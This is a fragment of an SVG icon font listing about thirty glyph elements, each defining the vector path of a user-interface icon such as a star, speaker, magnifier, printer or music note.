<glyph unicode="&#xe611;" d="M310.078 275.148l-54.078 166.369-54.095-166.368h-176.215l142.794-102.351-54.828-166.314 142.344 103.171 142.327-103.172-54.811 166.314 142.794 102.351h-176.232zM327.306 167.457l38.301-116.175-109.607 79.44-109.624-79.44 42.233 128.079-10.196 7.297-99.645 71.43h135.531l41.701 128.259 41.684-128.259h135.531l-109.824-78.727 3.915-11.904z" />
<glyph unicode="&#xe612;" d="M-0.329 282.944v-119.42h51.18v-102.36h17.060v102.36h131.232l124.601-100.827v324.139l-125.392-103.892h-198.681zM16.731 180.584v85.3h68.24v-85.3h-68.24zM209.239 269.807l97.445 80.743v-252.102l-101.502 82.134h-103.151v85.3h102.469l4.739 3.925zM441.815 371.317l-12.27-12.278c39.926-31.255 65.724-79.752 65.724-134.272 0-55.97-27.214-105.583-68.981-136.705l12.345-12.345c44.783 34.295 73.697 88.29 73.697 149.050-0.001 59.301-27.549 112.155-70.515 146.55zM386.986 316.48l-12.404-12.403c26.332-16.635 43.917-45.924 43.917-79.31 0-34.861-19.151-65.283-47.457-81.46l12.428-12.429c31.255 19.61 52.088 54.271 52.088 93.889 0.001 38.143-19.258 71.763-48.572 91.713z" />
<glyph unicode="&#xe613;" d="M255.512 185.611c-37.627 0-68.24-30.613-68.24-68.24s30.613-68.24 68.24-68.24c37.627 0 68.24 30.613 68.24 68.24s-30.612 68.24-68.24 68.24zM255.512 66.191c-28.223 0-51.18 22.958-51.18 51.18s22.957 51.18 51.18 51.18c28.222 0 51.18-22.958 51.18-51.18s-22.958-51.18-51.18-51.18zM255.512 262.381c-57.586 0-107.291-33.82-130.682-82.576l12.77-12.762c19.434 45.949 64.966 78.277 117.912 78.277s98.478-32.329 117.913-78.277l12.769 12.762c-23.391 48.756-73.096 82.576-130.682 82.576zM256.345 398.869c-95.213 0-179.48-47.565-230.443-120.128l12.228-12.229c47.682 69.557 127.701 115.297 218.215 115.297 90.090 0 169.758-45.316 217.524-114.322l12.229 12.229c-51.039 72.013-134.964 119.153-229.753 119.153zM256.345 330.629c-76.454 0-143.603-40.467-181.254-101.077l12.42-12.412c34.204 57.661 97.062 96.429 168.834 96.429 71.339 0 133.89-38.285 168.226-95.379l12.378 12.378c-37.768 60.044-104.583 100.061-180.604 100.061z" />
<glyph unicode="&#xe614;" d="M380.985 177.497l55.911-55.936h-100.743l-208.186 221.78h-85.517v-17.060h78.137l208.185-221.78h108.124l-55.761-55.778 12.062-12.062 76.353 76.378-76.503 76.52zM120.587 121.561h-78.137v-17.060h85.517l82.601 87.999-12.445 11.679zM336.169 326.281h100.727l-55.761-55.778 12.062-12.062 76.353 76.378-76.503 76.52-12.062-12.062 55.911-55.936h-108.124l-82.967-88.716 12.461-11.645z" />
<glyph unicode="&#xe615;" d="M51.28 428.72v-409.44h409.44v409.44h-409.44zM443.66 36.34h-375.32v375.32h375.32v-375.32zM145.093 266.65c0-61.251 49.656-110.89 110.899-110.89s110.881 49.639 110.881 110.89v59.71h17.077v17.060h-51.18v-17.060h17.043v-59.71c0-51.738-42.091-93.83-93.821-93.83-51.746 0-93.839 42.092-93.839 93.83v59.71h17.077v17.060h-51.18v-17.060h17.043v-59.71z" />
<glyph unicode="&#xe616;" d="M418.070 445.78c-37.685 0-68.24-30.563-68.24-68.24 0-6.539 0.975-12.853 2.691-18.842l-199.497-83.618c-11.795 20.434-33.821 34.22-59.094 34.22-37.677 0-68.24-30.563-68.24-68.24 0-37.685 30.563-68.24 68.24-68.24 19.743 0 37.486 8.439 49.947 21.85l128.55-92.389c-5.022-9.504-7.897-20.317-7.897-31.813 0-37.693 30.563-68.249 68.24-68.249s68.24 30.555 68.24 68.249c0 37.677-30.563 68.231-68.24 68.231-20.042 0-38.018-8.705-50.505-22.465l-128.375 92.239c5.282 9.688 8.28 20.784 8.28 32.587 0 6.339-0.932 12.454-2.549 18.285l199.647 83.684c11.853-20.158 33.72-33.736 58.802-33.736 37.686 0 68.24 30.554 68.24 68.248 0 37.676-30.554 68.239-68.24 68.239zM332.77 121.64c28.222 0 51.18-22.958 51.18-51.171 0-28.222-22.958-51.189-51.18-51.189s-51.18 22.966-51.18 51.189c0 28.213 22.958 51.171 51.18 51.171zM93.93 189.88c-28.222 0-51.18 22.958-51.18 51.18s22.958 51.18 51.18 51.18 51.18-22.958 51.18-51.18c0-28.221-22.958-51.18-51.18-51.18zM418.070 326.352c-28.222 0-51.18 22.966-51.18 51.188s22.958 51.18 51.18 51.18c28.222 0 51.18-22.958 51.18-51.18s-22.958-51.188-51.18-51.188z" />
<glyph unicode="&#xe617;" d="M256 445.78c-108.358 0-196.19-42.009-196.19-93.839v-255.9c0-51.813 87.832-93.821 196.19-93.821 108.34 0 196.19 42.009 196.19 93.821v255.9c0 51.83-87.85 93.839-196.19 93.839zM256 428.72c105.559 0 179.13-40.459 179.13-76.779 0-36.303-73.571-76.761-179.13-76.761-105.576 0-179.13 40.459-179.13 76.761 0 36.32 73.554 76.779 179.13 76.779zM435.13 113.101v-17.060c0-36.303-73.571-76.761-179.13-76.761-105.576 0-179.13 40.459-179.13 76.761v47.049c30.621-32.737 99.277-55.57 179.13-55.57 79.835 0 148.508 22.832 179.13 55.57v-29.989zM435.13 181.341c0-36.303-73.571-76.761-179.13-76.761-105.576 0-179.13 40.459-179.13 76.761v47.049c30.621-32.737 99.277-55.57 179.13-55.57 79.835 0 148.508 22.832 179.13 55.57v-47.049zM435.13 266.641c0-36.303-73.571-76.761-179.13-76.761-105.576 0-179.13 40.459-179.13 76.761v47.049c30.621-32.737 99.277-55.57 179.13-55.57 79.835 0 148.508 22.832 179.13 55.57v-47.049z" />
<glyph unicode="&#xe618;" d="M457.463 43.639l-116.205 116.217c23.358 28.089 37.419 64.167 37.419 103.543 0 89.515-72.554 162.070-162.070 162.070-89.498 0-162.070-72.555-162.070-162.070 0-89.498 72.572-162.070 162.070-162.070 39.385 0 75.454 14.061 103.543 37.419l116.205-116.217 21.108 21.108zM71.597 263.399c0 79.96 65.041 145.010 145.010 145.010 79.953 0 145.010-65.050 145.010-145.010s-65.057-145.010-145.010-145.010c-79.969 0-145.010 65.050-145.010 145.010z" />
<glyph unicode="&#xe619;" d="M393.425 224c41.867 43.033 60.601 84.908 44.899 110.748-6.256 10.304-20.676 22.582-53.812 22.582-18.168 0-39.41-3.682-62.326-10.462-15.22 54.995-40.576 90.382-69.848 90.382-28.913 0-54.012-34.537-69.289-88.399-20.25 5.515-39.051 8.48-55.37 8.48-33.137 0-47.556-12.278-53.821-22.582-12.587-20.709-4.148-51.622 23.758-87.041 6.223-7.897 13.32-15.844 21.075-23.775-41.834-43-60.535-84.858-44.833-110.698 6.264-10.296 20.684-22.575 53.812-22.575 16.319 0 35.128 2.974 55.387 8.481 15.269-53.854 40.367-88.39 69.281-88.39 29.272 0 54.629 35.386 69.848 90.373 22.908-6.781 44.158-10.463 62.334-10.463 33.129 0 47.549 12.279 53.805 22.575 15.701 25.847-3.033 67.739-44.9 110.764zM384.512 340.271c13.911 0 32.012-2.499 39.235-14.386 10.404-17.118-5.256-51.755-42.484-89.957-13.578 12.704-29.063 25.39-46.198 37.668-1.849 20.201-4.807 39.21-8.722 56.628 21.649 6.481 41.567 10.047 58.169 10.047zM291.357 165.964c-11.679-7.097-23.491-13.636-35.261-19.6-11.762 5.964-23.574 12.503-35.253 19.6-12.295 7.472-24.049 15.311-35.22 23.366-0.725 11.179-1.192 22.692-1.192 34.67 0 11.995 0.467 23.516 1.199 34.711 10.93 7.897 22.658 15.711 35.186 23.324 11.687 7.097 23.499 13.636 35.278 19.609 11.778-5.973 23.591-12.512 35.278-19.609 9.638-5.857 18.668-11.854 27.364-17.893 0.975-12.837 1.517-26.214 1.517-40.142 0-13.92-0.542-27.306-1.517-40.134-8.695-6.040-17.734-12.046-27.379-17.902zM316.563 161.733c-1.674-13.77-3.923-26.64-6.555-38.652-11.288 3.982-22.916 8.689-34.703 14.036 8.306 4.482 16.627 9.229 24.915 14.27 5.58 3.389 11.020 6.855 16.343 10.346zM236.886 137.125c-14.228-6.464-28.222-11.954-41.659-16.402-3.232 14.228-5.856 29.764-7.705 46.516 7.939-5.415 16.044-10.738 24.457-15.852 8.289-5.041 16.602-9.789 24.907-14.262zM167.772 202.891c-8.738 6.931-17.018 13.978-24.674 21.084 7.514 7.006 15.81 14.078 24.674 21.142-0.259-6.938-0.4-13.977-0.4-21.116-0.001-7.141 0.141-14.18 0.4-21.11zM187.539 280.87c1.841 16.702 4.465 32.203 7.688 46.407 13.436-4.448 27.423-9.938 41.65-16.394-8.305-4.482-16.635-9.229-24.923-14.269-8.439-5.132-16.568-10.397-24.415-15.744zM275.312 310.882c11.787 5.348 23.407 10.046 34.695 14.028 2.632-12.003 4.881-24.865 6.555-38.635-5.323 3.499-10.754 6.948-16.326 10.338-8.288 5.040-16.619 9.788-24.924 14.269zM336.63 251.139c11.862-9.046 22.774-18.143 32.421-27.139-9.647-8.989-20.559-18.085-32.421-27.131 0.433 8.871 0.683 17.918 0.683 27.131 0.001 9.212-0.249 18.259-0.683 27.139zM252.338 420.19c19.435 0 40.168-29.639 53.546-78.553-16.094-5.598-32.829-12.629-49.789-20.9-19.393 9.455-38.469 17.268-56.645 23.199 13.396 47.532 33.763 76.254 52.888 76.254zM88.436 325.885c7.222 11.887 25.323 14.386 39.243 14.386 14.777 0 32.204-2.832 51.114-8.022-4.524-19.642-7.848-41.334-9.705-64.533-13.987-10.447-26.79-21.125-38.219-31.838-7.305 7.481-14.003 14.961-19.85 22.391-22.85 28.998-31.080 53.638-22.583 67.616zM127.67 107.72c-13.912 0-32.012 2.499-39.235 14.378-10.404 17.127 5.248 51.755 42.458 89.957 11.562-10.771 24.399-21.375 38.185-31.671 1.849-23.241 5.181-44.966 9.713-64.641-18.908-5.183-36.335-8.023-51.121-8.023zM252.338 27.81c-19.125 0-39.492 28.721-52.888 76.245 18.177 5.939 37.261 13.745 56.645 23.208 16.96-8.272 33.695-15.302 49.789-20.908-13.378-48.915-34.111-78.545-53.546-78.545zM423.746 122.098c-7.222-11.879-25.315-14.378-39.227-14.378-16.61 0-36.527 3.566-58.177 10.047 3.915 17.426 6.873 36.435 8.73 56.644 17.127 12.287 32.612 24.965 46.19 37.668 37.228-38.21 52.888-72.854 42.484-89.981z" />
<glyph unicode="&#xe61a;" d="M93.926 428.72v-409.44l162.070 119.42 162.078-119.42v409.44h-324.148zM401.014 53.042l-145.018 106.85-145.010-106.85v358.618h290.028v-358.618zM170.696 326.36h170.604v-17.060h-170.604v17.060zM170.696 258.12h170.604v-17.060h-170.604v17.060z" />
<glyph unicode="&#xe61b;" d="M434.888 112.818h-359.959l71.872 71.897-12.062 12.062-91.881-91.905 91.881-91.89 12.062 12.063-70.706 70.713h375.853v153.54h-17.060zM76.695 334.598h359.81l-71.289-71.305 12.061-12.062 91.865 91.88-91.881 91.907-12.062-12.063 71.272-71.297h-376.836v-153.54h17.060z" />
<glyph unicode="&#xe61c;" d="M443.66 181.371c0-103.477-84.183-187.66-187.66-187.66-103.476 0-187.66 84.183-187.66 187.66 0 103.234 83.8 187.251 186.952 187.643v-85.325l162.070 93.839-162.070 93.821v-85.275c-112.756-0.383-204.012-91.855-204.012-204.703 0-113.047 91.639-204.72 204.72-204.72 113.064 0 204.72 91.673 204.72 204.72h-17.060zM272.352 441.761l110.957-64.233-110.957-64.25v128.483z" />
<glyph unicode="&#xe61d;" d="M418.316 249.682c0.033 1.366 0.2 2.682 0.2 4.048 0 73.021-59.194 132.215-132.215 132.215-52.613 0-97.912-30.804-119.196-75.287-9.205 4.632-19.567 7.297-30.572 7.297-33.769 0-61.742-24.574-67.207-56.794-40.216-13.795-69.18-51.847-69.18-96.763 0-56.494 45.79-102.293 102.268-102.343l316.102 0.016c51.596 0.267 93.338 42.15 93.338 93.797 0 51.73-41.841 93.664-93.538 93.814zM418.424 79.131l-3.723-0.016h-312.27c-46.99 0.049-85.225 38.301-85.225 85.283 0 36.403 23.174 68.806 57.653 80.636l9.596 3.281 1.691 9.996c4.182 24.674 25.373 42.583 50.388 42.583 7.972 0 15.677-1.849 22.9-5.481l15.553-7.813 7.505 15.693c19.068 39.851 59.818 65.591 103.81 65.591 63.5 0 115.155-51.647 115.155-115.155 0-0.35-0.042-0.717-0.067-1.066-0.049-0.85-0.107-1.699-0.125-2.566l-0.433-17.41 17.435-0.067c42.2-0.117 76.528-34.553 76.528-76.754-0.001-42.082-34.263-76.518-76.371-76.735zM255.996 138.825c-32.92 0-59.71 26.773-59.71 59.71 0 32.921 26.79 59.71 59.71 59.71v-31.505l64.2 37.069-64.2 37.086v-25.59c-42.4 0-76.77-34.37-76.77-76.77s34.37-76.77 76.77-76.77c42.392 0 76.77 34.37 76.77 76.77h-17.060c0-32.937-26.79-59.71-59.71-59.71z" />
<glyph unicode="&#xe61e;" d="M449.825 334.434c-0.175 0.058-0.308 0.191-0.491 0.233l-361.976 85.3c-4.589 1.058-9.188-1.766-10.262-6.347-1.075-4.59 1.766-9.18 6.348-10.263l290.536-68.464h-307.314c-13.204 0-23.916-10.704-23.916-23.916v-259.257c0-13.203 10.713-23.907 23.916-23.907h378.668c13.212 0 23.916 10.704 23.916 23.907v259.256c0 11.67-8.363 21.358-19.425 23.458zM452.19 51.719c0-3.774-3.073-6.847-6.856-6.847h-378.668c-3.782 0-6.856 3.073-6.856 6.847v259.257c0 3.781 3.074 6.856 6.856 6.856h378.668c3.782 0 6.856-3.074 6.856-6.856v-259.257zM196.223 198.419c-7.064 0-12.811-5.73-12.811-12.795 0-7.047 5.748-12.795 12.811-12.795 7.047 0 12.779 5.748 12.779 12.795 0 7.065-5.731 12.795-12.779 12.795zM102.46 185.624c0 7.065-5.748 12.795-12.803 12.795-7.048 0-12.787-5.73-12.787-12.795 0-7.047 5.74-12.795 12.787-12.795 7.055 0 12.803 5.749 12.803 12.795zM302.924 198.419c-7.047 0-12.804-5.73-12.804-12.795 0-7.047 5.757-12.795 12.804-12.795 7.072 0 12.786 5.748 12.786 12.795 0 7.065-5.714 12.795-12.786 12.795zM149.367 173.538c-7.048 0-12.787-5.731-12.787-12.787s5.74-12.803 12.787-12.803c7.055 0 12.803 5.747 12.803 12.803s-5.748 12.787-12.803 12.787zM256 160.034c0 7.056-5.73 12.787-12.795 12.787-7.047 0-12.795-5.731-12.795-12.787s5.748-12.803 12.795-12.803c7.065 0.001 12.795 5.748 12.795 12.803zM149.367 224.002c-7.048 0-12.787-5.74-12.787-12.787 0-7.072 5.74-12.803 12.787-12.803 7.055 0 12.803 5.73 12.803 12.803 0 7.047-5.748 12.787-12.803 12.787zM243.205 198.412c7.065 0 12.795 5.73 12.795 12.803 0 7.047-5.73 12.787-12.795 12.787-7.047 0-12.795-5.74-12.795-12.787 0-7.073 5.748-12.803 12.795-12.803zM106.725 146.998c-7.055 0-12.795-5.73-12.795-12.795s5.74-12.795 12.795-12.795c7.047 0 12.795 5.731 12.795 12.795s-5.748 12.795-12.795 12.795zM285.864 146.998c-7.072 0-12.804-5.73-12.804-12.795s5.731-12.795 12.804-12.795c7.056 0 12.786 5.731 12.786 12.795s-5.73 12.795-12.786 12.795zM106.725 249.592c-7.055 0-12.795-5.748-12.795-12.804s5.74-12.786 12.795-12.786c7.047 0 12.795 5.73 12.795 12.786 0 7.055-5.748 12.804-12.795 12.804zM285.864 224.002c7.056 0 12.786 5.73 12.786 12.786 0 7.055-5.73 12.804-12.786 12.804-7.072 0-12.804-5.748-12.804-12.804s5.731-12.786 12.804-12.786zM140.196 113.112c-7.039 0-12.795-5.731-12.795-12.787s5.756-12.803 12.795-12.803c7.081 0 12.795 5.748 12.795 12.803s-5.714 12.787-12.795 12.787zM251.402 113.112c-7.056 0-12.795-5.731-12.795-12.787s5.739-12.803 12.795-12.803c7.064 0 12.795 5.748 12.795 12.803s-5.731 12.787-12.795 12.787zM140.845 258.122c7.081 0 12.795 5.73 12.795 12.786 0 7.072-5.714 12.804-12.795 12.804-7.038 0-12.795-5.731-12.795-12.804 0-7.056 5.757-12.786 12.795-12.786zM251.402 283.712c-7.056 0-12.795-5.731-12.795-12.804 0-7.056 5.739-12.786 12.795-12.786 7.064 0 12.795 5.73 12.795 12.786 0 7.072-5.731 12.804-12.795 12.804zM196.216 146.998c-7.056 0-12.804-5.73-12.804-12.795 0-7.047 5.748-12.795 12.804-12.795 7.055 0 12.786 5.748 12.786 12.795 0 7.064-5.731 12.795-12.786 12.795zM196.216 96.068c-7.056 0-12.804-5.748-12.804-12.804s5.748-12.803 12.804-12.803c7.055 0 12.786 5.748 12.786 12.803s-5.731 12.804-12.786 12.804zM196.216 249.592c-7.056 0-12.804-5.748-12.804-12.804s5.748-12.786 12.804-12.786c7.055 0 12.786 5.73 12.786 12.786 0 7.055-5.731 12.804-12.786 12.804zM196.216 300.772c-7.056 0-12.804-5.731-12.804-12.787s5.748-12.803 12.804-12.803c7.055 0 12.786 5.748 12.786 12.803s-5.731 12.787-12.786 12.787zM392.497 283.712c-14.128 0-25.607-11.454-25.607-25.582s11.479-25.581 25.607-25.581c14.111 0 25.573 11.454 25.573 25.581 0 14.128-11.462 25.582-25.573 25.582zM392.497 249.608c-4.715 0-8.547 3.824-8.547 8.521s3.833 8.522 8.547 8.522c4.698 0 8.513-3.824 8.513-8.522s-3.815-8.521-8.513-8.521zM392.497 215.472c-14.128 0-25.607-11.454-25.607-25.582s11.479-25.581 25.607-25.581c14.111 0 25.573 11.454 25.573 25.581s-11.462 25.582-25.573 25.582zM392.497 181.368c-4.715 0-8.547 3.824-8.547 8.521s3.833 8.522 8.547 8.522c4.698 0 8.513-3.824 8.513-8.522s-3.815-8.521-8.513-8.521z" />
<glyph unicode="&#xe61f;" d="M119.52 283.71c-9.43 0-17.060-7.639-17.060-17.060s7.63-17.060 17.060-17.060c9.413 0 17.060 7.639 17.060 17.060s-7.647 17.060-17.060 17.060zM170.7 283.71c-9.43 0-17.060-7.639-17.060-17.060s7.63-17.060 17.060-17.060c9.413 0 17.060 7.639 17.060 17.060s-7.647 17.060-17.060 17.060zM469.25 351.95h-93.83v85.3h-238.84v-85.3h-93.83c-4.715 0-8.53-3.815-8.53-8.53v-255.9c0-4.715 3.815-8.53 8.53-8.53h93.83v-68.24h238.84v68.24h93.83c4.714 0 8.53 3.815 8.53 8.53v255.9c0 4.715-3.816 8.53-8.53 8.53zM153.64 420.19h204.72v-68.24h-204.72v68.24zM358.36 27.81h-204.72v153.54h204.72v-153.54zM460.72 96.050h-85.3v102.36h-238.84v-102.36h-85.3v238.84h409.44v-238.84z" />
<glyph unicode="&#xe620;" d="M256 224.009l238.84-136.489v272.96l-238.84-136.471zM477.78 116.917l-187.394 107.092 187.394 107.074v-214.166zM17.16 224.009l238.84-136.489v272.96l-238.84-136.471zM238.94 116.917l-187.394 107.092 187.394 107.074v-214.166z" />
<glyph unicode="&#xe621;" d="M244.888 437.25h17.060v-204.72h-17.060v204.72zM338.718 402.731v-18.868c62.101-30.63 104.942-94.596 104.942-168.392 0-103.476-84.183-187.66-187.66-187.66-103.476 0-187.66 84.184-187.66 187.66 0 71.739 40.477 134.173 99.778 165.744v19.183c-69.081-32.888-116.838-103.318-116.838-184.928 0-113.064 91.657-204.72 204.72-204.72s204.72 91.656 204.72 204.72c0 83.618-50.155 155.481-122.002 187.261z" />
<glyph unicode="&#xe622;" d="M315.71 364.745v42.65h-119.42v-42.65h-145.010v-324.14h409.44v324.14h-145.010zM213.35 390.335h85.3v-25.59h-85.3v25.59zM196.29 347.685h247.37v-136.48h-127.95v34.12h-119.42v-34.12h-127.95v136.48h127.95zM298.65 228.265v-51.18h-85.3v51.18h85.3zM68.34 57.665v136.48h127.95v-34.12h119.42v34.12h127.95v-136.48h-375.32z" />
<glyph unicode="&#xe623;" d="M256 437.248c-117.787 0-213.25-95.463-213.25-213.25s95.463-213.246 213.25-213.246c117.788 0 213.25 95.458 213.25 213.246s-95.462 213.25-213.25 213.25zM256 27.812c-108.174 0-196.19 88.012-196.19 196.186s88.016 196.19 196.19 196.19c108.174 0 196.19-88.015 196.19-196.19 0-108.174-88.016-196.186-196.19-196.186zM264.53 351.948h-17.060v-119.42h-118.854v-17.060h118.854v-118.854h17.060v118.854h119.42v17.060h-119.42z" />
<glyph unicode="&#xe624;" d="M119.52 373.425l256.158-149.425-256.158-149.424v298.849zM102.46 403.13v-358.26l307.080 179.13-307.080 179.13z" />
<glyph unicode="&#xe625;" d="M145.974-7.426l-21.276 100.294-101.084 22.349 20.65 39.593 92.555 5.057c4.749 6.181 15.361 19.742 21.992 26.365l84.334 84.342-175.823 86.208 44.516 44.507 222.913-39.102 78.928 78.928c9.355 9.363 23.932 14.311 42.15 14.311 12.42 0 22.316-2.283 22.732-2.382l4.798-1.124 1.424-4.715c7.497-24.807 2.99-52.771-10.713-66.482l-79.302-79.303 38.951-222.004-44.508-44.516-85.866 175.115-78.769-78.786c-8.28-8.28-25.964-24.574-32.529-30.589l-6.889-86.807-39.184-21.259zM49.037 127.063l90.073-19.901 18.81-88.699 10.962 5.948 6.689 84.284 2.482 2.266c0.25 0.225 24.674 22.541 34.453 32.321l95.655 95.671 85.866-175.115 21.35 21.358-38.951 222.021 85.583 85.567c7.43 7.43 11.928 25.564 7.738 44.524-3.449 0.516-8.413 1.058-13.919 1.058-9.48 0-22.391-1.616-30.089-9.313l-85.192-85.208-222.928 39.101-21.358-21.35 175.823-86.208-101.211-101.22c-7.721-7.713-22.691-27.547-22.841-27.739l-2.391-3.165-90.748-4.964-5.856-11.237z" />
<glyph unicode="&#xe626;" d="M426.598 343.42v68.24h-400.906v-307.080h59.71v-68.24h400.906v307.080h-59.71zM42.752 121.64v272.96h366.786v-51.18h-324.136v-221.78h-42.65zM469.248 53.4h-366.786v272.96h366.786v-272.96z" />
<glyph unicode="&#xe627;" d="M369.381 454.31h-226.761c-12.754 0-23.1-10.355-23.1-23.108v-414.413c0-12.77 10.346-23.099 23.1-23.099h226.761c12.754 0 23.099 10.329 23.099 23.099v414.413c0 12.753-10.345 23.108-23.099 23.108zM375.42 16.789c0-3.332-2.707-6.039-6.039-6.039h-226.761c-3.333 0-6.040 2.707-6.040 6.039v79.202h238.84v-79.202zM375.42 113.051h-238.84v272.669h238.84v-272.669zM375.42 402.78h-238.84v28.422c0 3.332 2.707 6.048 6.040 6.048h226.761c3.333 0 6.039-2.716 6.039-6.048v-28.422zM230.41 61.93h51.18v-17.060h-51.18v17.060z" />
<glyph unicode="&#xe628;" d="M492.341 387.17l-68.023 68.015-16.644-16.651-23.291 23.274c-3.332 3.332-8.73 3.332-12.061 0l-138.214-138.222c-3.332-3.333-3.332-8.73 0-12.062 1.667-1.666 3.849-2.499 6.032-2.499 2.182 0 4.365 0.833 6.031 2.499l132.182 132.19 17.26-17.243-293.103-293.094 19.759-19.767c-8.313 4.115-17.376 6.214-26.44 6.214-15.31 0-30.621-5.84-42.3-17.527-1.199-1.183-2.349-2.466-3.449-3.807-0.549-0.641-1.066-1.308-1.566-1.974-0.6-0.75-1.166-1.541-1.715-2.333-0.417-0.583-0.833-1.15-1.216-1.732-24.807-37.294-25.923-108.624-25.923-108.624s2.599-0.133 7.097-0.133c20.492 0 80.152 2.807 111.373 34.020 18.593 18.601 22.341 46.398 11.295 68.748l21.108-21.1 321.808 321.808zM126.067 29.776c-19.042-19.034-52.446-25.606-76.27-27.856l38.836 38.835-12.063 12.062-37.202-37.202c3.032 22.757 9.063 50.33 20.476 67.465l0.483 0.682 0.416 0.592c0.367 0.533 0.75 1.082 1.416 1.924 0.283 0.374 0.566 0.749 1.066 1.349 0.75 0.899 1.517 1.766 2.366 2.607 8.080 8.080 18.81 12.529 30.238 12.529 11.412 0 22.158-4.448 30.238-12.529 16.661-16.667 16.661-43.79 0-60.458zM468.218 387.17l-101.178-101.178-43.9 43.891 101.178 101.178 43.9-43.891zM311.079 317.822l43.9-43.891-184.446-184.445-43.899 43.891 184.445 184.445z" />
<glyph unicode="&#xe629;" d="M198.064 164.206l76.262-153.456 194.899 426.5-426.45-204.67 155.289-68.374zM202.596 180.834l-119.045 52.413 326.938 156.905-207.893-209.318zM273.693 50.151l-59.002 118.738 209.743 211.166-150.741-329.904z" />
<glyph unicode="&#xe62a;" d="M447.925 394.6v26.456c0 23.075-18.71 41.784-41.784 41.784h-274.676c-23.074 0-41.767-18.71-41.767-41.784v-26.456h-7.831c-19.259 0-34.853-15.611-34.853-34.862v-58.385c0-19.251 15.594-34.861 34.853-34.861l160.588 0.050c9.813 0 17.81-7.989 17.81-17.802v-58.86h-34.104v-204.72h85.3v204.72h-34.136v58.86c0 19.251-15.611 34.862-34.87 34.862h-21.125v-0.050h-139.462c-9.813 0-17.793 7.988-17.793 17.801v58.385c0 9.813 7.98 17.802 17.793 17.802h7.831v-26.465c0-23.075 18.693-41.775 41.767-41.775h274.675c23.075 0 41.784 18.7 41.784 41.775v26.465h17.060v17.060h-17.060zM294.401 2.22h-51.18v170.6h51.18v-170.6zM430.865 351.075c0-13.628-11.096-24.715-24.724-24.715h-274.676c-13.628 0-24.707 11.087-24.707 24.715v69.981c0 13.636 11.079 24.724 24.707 24.724h274.675c13.628 0 24.724-11.088 24.724-24.724v-69.981z" />
<glyph unicode="&#xe62b;" d="M256 428.72h-136.48c-40.818 0-68.24-27.422-68.24-68.24v-283.731c0-13.477 5.022-57.469 69.705-57.469h339.735v409.44h-204.72zM238.94 411.66v-163.194l-41.784 38.051-46.39-39.034v164.177h88.174zM119.52 411.66h14.186v-200.829l63 53.012 59.294-53.987v201.804h187.66v-281.49h-324.14c-21.709 0-39.318-6.48-51.18-17.81v248.12c0 31.088 20.092 51.18 51.18 51.18zM120.985 36.34c-39.109 0-50.413 17.743-52.304 34.721 0.033 26.331 19.026 42.049 50.839 42.049h324.14v-76.77h-322.675z" />
<glyph unicode="&#xe62c;" d="M444.473 412.837c-4.998 4.99-11.554 7.488-18.102 7.488-6.555 0-13.103-2.498-18.093-7.488l-75.295-75.287v14.261h-272.96v-324.136h324.14v272.956h-15.693l76.003 76.013c10.005 9.978 10.005 26.196 0 36.193zM367.103 44.735h-290.020v290.016h253.11l-133.69-133.681v-36.919h35.503l135.097 135.114v-254.53zM432.411 388.704l-207.469-207.493h-11.379v12.795l206.786 206.777c2.166 2.166 4.698 2.482 6.022 2.482s3.866-0.324 6.039-2.498c2.183-2.174 2.508-4.715 2.508-6.039 0.001-1.317-0.324-3.841-2.507-6.024z" />
<glyph unicode="&#xe62d;" d="M17.16 360.48v-272.96l238.84 136.489-238.84 136.471zM34.22 331.083l187.394-107.075-187.394-107.091v214.166zM256 360.48v-272.96l238.84 136.489-238.84 136.471zM273.060 331.083l187.394-107.075-187.394-107.091v214.166z" />
<glyph unicode="&#xe62e;" d="M145.11 437.25v-238.84h-102.36c0 0 0-105.425 0-139.495 0-34.078 31.721-48.165 55.228-48.165 23.499 0 260.165 0 320.092 0 25.857 0 51.18 25.149 51.18 51.18 0 18.793 0 375.32 0 375.32h-324.14zM97.978 27.81c-10.621 0-38.168 5.59-38.168 31.105v122.435h85.3v-115.080c0-11.42-14.927-38.46-38.459-38.46h-8.673zM452.19 61.93c0-16.576-17.534-34.12-34.12-34.12h-273.801c11.487 11.971 17.901 27.689 17.901 38.46v353.92h290.020v-358.26zM196.29 386.070h221.78v-17.060h-221.78v17.060zM196.29 155.76h221.78v-17.060h-221.78v17.060zM196.29 96.050h221.78v-17.060h-221.78v17.060zM418.070 326.36h-221.78v-127.95h221.78v127.95zM401.010 215.47h-187.66v93.83h187.66v-93.83z" />
<glyph unicode="&#xe62f;" d="M42.75 343.408h221.78v-17.060h-221.78v17.060zM42.75 266.638h221.78v-17.060h-221.78v17.060zM42.75 189.868h221.78v-17.060h-221.78v17.060zM349.83 333.212l119.42-15.394c0 85.3-68.24 102.36-136.48 119.445v-324.165c-10.212 0-26.456 0-52.563 0-50.138 0-66.857-26.531-66.857-50.764 0-20.558 15.386-51.596 68.24-51.596 75.571 0 68.24 60.676 68.24 102.36v220.114zM450.657 337.419l-100.827 12.994v64.809c56.695-15.353 93.106-32.213 100.827-77.803zM320.275 39.535c-7.68-7.789-20.701-11.737-38.685-11.737-48.714 0-51.18 28.773-51.18 34.536 0 21.417 18.152 33.704 49.797 33.704h52.563v-13.103h0.042c-0.509-17.186-2.949-33.687-12.537-43.4z" />
<glyph unicode="&#xe630;" d="M460.72 456.721l-281.49-99.578v-246.679c-13.303 15.786-33.195 25.84-55.445 25.84-40.035 0-72.505-32.47-72.505-72.521 0-40.035 32.47-72.505 72.505-72.505 39.618 0 71.771 31.804 72.438 71.264h0.067v282.54l247.37 87.516v-228.311c-13.303 15.786-33.195 25.831-55.454 25.831-40.042 0-72.496-32.454-72.496-72.505 0-40.042 32.454-72.505 72.496-72.505s72.514 32.463 72.514 72.505c0 1.374-0.133 2.715-0.208 4.065h0.208v295.043zM123.785 8.339c-30.572 0-55.445 24.873-55.445 55.445 0 30.579 24.873 55.461 55.445 55.461s55.445-24.882 55.445-55.461c0-30.572-24.873-55.445-55.445-55.445zM388.206 102.169c-30.572 0-55.436 24.873-55.436 55.445s24.865 55.445 55.436 55.445c30.58 0 55.454-24.873 55.454-55.445s-24.873-55.445-55.454-55.445z" />
